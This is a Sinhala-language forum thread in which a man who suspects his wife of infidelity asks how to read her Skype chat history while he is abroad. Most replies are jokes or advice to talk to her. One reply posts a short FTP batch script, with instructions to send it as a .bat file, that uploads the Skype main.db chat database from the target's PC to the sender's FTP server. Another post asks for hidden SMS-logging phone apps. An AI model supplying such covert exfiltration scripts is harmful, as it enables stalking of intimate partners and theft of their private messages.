MATA UDAU KARAPAN..MACHAN

markhaloce

Member
Mar 7, 2013
10,298
677
0
17
The Real North
ehama nam wenne na kiyala sure.. but ehema unoth nam mama aye samawak denne na.. pain deela elwanne.. mama kohomath kalinma kiyala tiyenne mata boru kiyannath epa boru karannath epa.. ehema unoth wena wipake :cool:

පයිං දීපු ගමං ඇවිත් පොලිසියෙන් කුදලං ගිහිං හිරේ දානව :lol: :lol: :lol: :lol:
හිතං ඉන්නෙ මේ කින්ග්ස් ලෑන්ඩිං කියලද පයිං දීල එලවන්න :lol: :lol: :lol:
 

Ridila™

Well-known member
  • Jun 7, 2013
    31,010
    1,785
    113
    ඇයි එන්නද.?
    ehama nam wenne na kiyala sure.. but ehema unoth nam mama aye samawak denne na.. pain deela elwanne.. mama kohomath kalinma kiyala tiyenne mata boru kiyannath epa boru karannath epa.. ehema unoth wena wipake :cool:

    අනිවා. දැන් මේ ත්‍රෙඩ් එක දාපු බුවා රට ඉන්නේ කියන විදිහට මචං. දැන් ඌ රට ඉද්දි මේ සැකේටනේ ඕක බලන්න හදන්නේ. බැරි වෙලාවට එහෙම ඇත්තටම මුගේ වයිෆ් වෙන කා එක්ක හරි සම්බන්ධයක් පටන් අරගෙන නම්? මොකද කරන්නේ? අනේ එපා කියන්නද බං කිව්වට අහන එකක් නෑනේ. අයින් වෙන්න තමයි තියෙන්නේ ළමයත් අරගෙනම.
     

    Lakshan-Seram

    Well-known member
  • May 31, 2011
    24,722
    12,633
    113
    127.0.0.1:8080/Kandy
    පයිං දීපු ගමං ඇවිත් පොලිසියෙන් කුදලං ගිහිං හිරේ දානව :lol: :lol: :lol: :lol:
    හිතං ඉන්නෙ මේ කින්ග්ස් ලෑන්ඩිං කියලද පයිං දීල එලවන්න :lol: :lol: :lol:
    kudalan giyapu den ban.. kawda owa ganan ganne.. onna mama giya uba one reply ekak dapan.. mata welawak na.. ubalath ekka petali petali inna.. :no::no:
     

    markhaloce

    Member
    Mar 7, 2013
    10,298
    677
    0
    17
    The Real North
    kudalan giyapu den ban.. kawda owa ganan ganne.. onna mama giya uba one reply ekak dapan.. mata welawak na.. ubalath ekka petali petali inna.. :no::no:

    කුදලං ගියාට පස්සෙ ඔහොම කියන්නෑනෙ බං :baffled: :baffled:
    කොහොමද ඒකෙ ඇතුලෙ ඉන්න සමලිංගිකයන්ට අලුත් එකෙක් ආවාම :baffled: :baffled:
    :D :D :D :D
    පැටලෙන්න නෙමේ කුකුලොහ් රිප්ලයි කලේ :baffled: :baffled:
     

    මම බෙනා

    Well-known member
  • Sep 8, 2012
    5,428
    970
    113
    ලංකාවේ
    ඒ ෆෝල්ඩර් එකට ඩිෆෝල්ට් කිසිම රෙස්ට්‍රික්ශන් එකක් නෑ කුකුලෝහ් :yes: :yes: :yes:
    නිකංම කොපි කමාන්ට් එකක් පාවිච්චි කල්ල ඉස්සුවෑකි :yes: :yes:

    ජබුඃ

    මම අහන්නේ බන්...කොපි කමාන්ඩ් එක යවන්ඩ කෝඩ් එකක් කියපන්කෝ...මෝකක් හරි ක්‍රමයක් බන්...මම කියන්නේ ඩේටාබේස් ෆයිල් එක ගල්ටික් කරන්ඩ
     

    markhaloce

    Member
    Mar 7, 2013
    10,298
    677
    0
    17
    The Real North
    මම බෙනා;18349029 said:
    ජබුඃ

    මම අහන්නේ බන්...කොපි කමාන්ඩ් එක යවන්ඩ කෝඩ් එකක් කියපන්කෝ...මෝකක් හරි ක්‍රමයක් බන්...මම කියන්නේ ඩේටාබේස් ෆයිල් එක ගල්ටික් කරන්ඩ

    තෝ ප්‍රෝග්‍රෑමර් කෙනෙක් නේද කුකුලෝහ් :eek: :eek: :eek:
    මට මතක විදිහට තෝ ප්‍රෝග්‍රෑමිං ත්‍රෙඩ් වලට එහෙම එබුන :eek: :eek: :eek:
    උඹට ඕනෙ එකකිං ලියාගනිං :eek: :eek: :eek:
    කෙල්ලගෙ කොමේ frameworks VMමොකුත් තියෙයි කියල ශුවර් නැත්තං C C++ වලිං ලියපං..
    https://msdn.microsoft.com/en-us/library/windows/desktop/aa363851(v=vs.85).aspx
    මේක බලපං :yes: :yes:
     

    .::J@S::.

    Well-known member
  • Dec 4, 2011
    9,724
    6,297
    113
    ගග අද්දර
    මන් එක පාරක් කලා හැබයි පාස්වර්ඩ් රීසෙට් කරල. නිකන් ලේ පුච්ච ගන්න වෙන්නෙ බන් ඔව බලල. මන් නම් කියන්නෙ බලන්න එපා. ලන්කාවට ඇවිත් ඕනි මගුලක් කරහන්.
     

    wingman

    Well-known member
  • Oct 3, 2009
    7,691
    2,741
    113
    In this moment
    මම බෙනා;18346164 said:
    ඒ මටත් කියපන්කෝ ඒ සිස්ටම් එක :shocked:

    Code:
    open ftp.drivehq.com
    Username
    Password
    mput "C:\users\USERNAME\Roaming\Skype\SubZer0\main.db"
    bye

    මෙච්චරයි.. :lol:
    ftp.drivehq.com - ඔයාලගේ ftp address එක..
    username, Password - FTP username,password
    C:\users\USERNAME\

    USERNAME කියන තැන Pc එකේ username එක.. මේක auto ගන්න %username% දාල බැලුව හරිගියේ නෑ.. :no::sorry:
    .Bat විදිහට save කරලා යවන්න..
     

    IveyStyle

    Member
    Aug 9, 2010
    27,492
    1,145
    0
    SiriLankawe
    හෙල්ප් වන්
    හෙල්ප් ටූ
    හෙල්ප් ත්‍රී
    මචං ෆෝන් එකේ එස් එම් එස් ඔක්කොම සේව් වෙලා හයිඩ් වෙන ජාව ඇප්ලිකේශන් එකක් තියෙනවද ?
    මචං ෆෝන් එකේ ඩිලීට් කරපු මැසේජස් රිකවරි කරන්න පුළුවන් සොෆ්ට්වෙයා තියෙනවද ?
    මචං ෆෝන් එකේ කතා කරපු නොම්බර ගන්න පුළුවන්ද ?
    > > > > >
    මචං ස්කයිප් වල චැට් හිස්ට්‍රිය බලන්න පුළුවන්ද මට 7 යියර්ස් ඕල්ඩ් දුවෙක් ඉන්නව :dull: :dull: :dull: :dull:

    අනේ මන්ද බං උඹනං :( :( :( :(
    OPEN EKE PLEEEEEEEEEEEEEEEEEEES HELP HODE::::::::::::
    MATATH WATINAWA:D
     

    coolshano

    Well-known member
  • Sep 1, 2007
    14,331
    622
    113
    N/A
    machan ithin wife ekka kelin katha karapan, anith eka ube wife nisa ubata onaa deyak ahanna puluwan wenna onee